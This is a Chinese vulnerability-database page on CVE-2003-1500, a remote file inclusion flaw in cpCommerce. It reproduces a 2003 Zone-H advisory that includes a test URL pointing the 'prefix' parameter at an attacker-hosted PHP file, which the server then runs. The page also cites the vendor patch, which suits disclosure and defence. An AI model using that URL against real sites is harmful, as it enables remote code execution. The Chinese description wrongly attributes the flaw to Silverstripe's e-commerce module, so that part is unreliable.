子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

CPCommerce远程文件包含漏洞

120

CPCommerce远程文件包含漏洞

漏洞ID 1202417 漏洞类型 代码注入
发布时间 2003-10-19 更新时间 2003-12-31
图片[1]-CPCommerce远程文件包含漏洞-安全小百科CVE编号 CVE-2003-1500
 		图片[2]-CPCommerce远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200312-440
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007100122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-440
|漏洞详情
Silverstripe是新西兰SilverStripe公司开发的一套自由且开源的内容管理系统。e-commerce是其中的一个电子商务模块。e-commerce包含的_functions.php脚本可包含远程文件,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。_functions.php包含如下有问题代码:require_once(“{$prefix}_config.php”);require_once(“{$prefix}_gateways.php”);由于对$prefix变量缺少充分过滤,攻击者可以指定远程服务器上的文件作为包含文件,可导致以WEB权限执行攻击者提供的恶意PHP命令。
|漏洞EXP
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce

Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Vendor: http://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)

Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".

Details
**********
There's a file inclusion vulnerability in the _functions.php file, line 13-14:

require_once("{$prefix}_config.php");
  require_once("{$prefix}_gateways.php");

Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).

To test the vulnerability try this:

http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://
www.attacker.com/index

In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
the server.

Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.

The patch is avaible here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=8
64.

Suggestions
**********
Fix the script with the patch proposed by the author.

Link to ariginal article here:
 
http://www.zone-h.org/en/advisories/read/id=3284/

Astharot - Zone-H Admin
-- 
http://www.zone-h.org - astharot (at) zone-h (dot) org [email concealed]
PGP Key: http://www.gife.org/astharot.asc

Linux User #292132
|参考资料

来源:XF
名称:cpCommerce-functionsphp-file-include(13457)
链接:http://xforce.iss.net/xforce/xfdb/13457
来源:BID
名称:8851
链接:http://www.securityfocus.com/bid/8851
来源:BUGTRAQ
名称:20031019ZH2003-31SA(securityadvisory):fileinclusionvulnerabilityincpCommerce
链接:http://www.securityfocus.com/archive/1/341757
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/6H00E2K8KG.html
来源:cpcommerce.org
链接:http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
来源:SREASON
名称:3301
链接:http://securityreason.com/securityalert/3301
来源:NSFOCUS
名称:5564
链接:http://www.nsfocus.net/vulndb/5564

相关推荐: Chi Kien Uong Guestbook Cross-Site Scripting Vulnerability

Chi Kien Uong Guestbook Cross-Site Scripting Vulnerability 漏洞ID 1099371 漏洞类型 Input Validation Error 发布时间 2003-10-27 更新时间 2003-10-2…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4771
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1194
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 588
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 531
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 523
安全小百科-gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
3年前 459
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020430
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012860
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011940
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010510
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666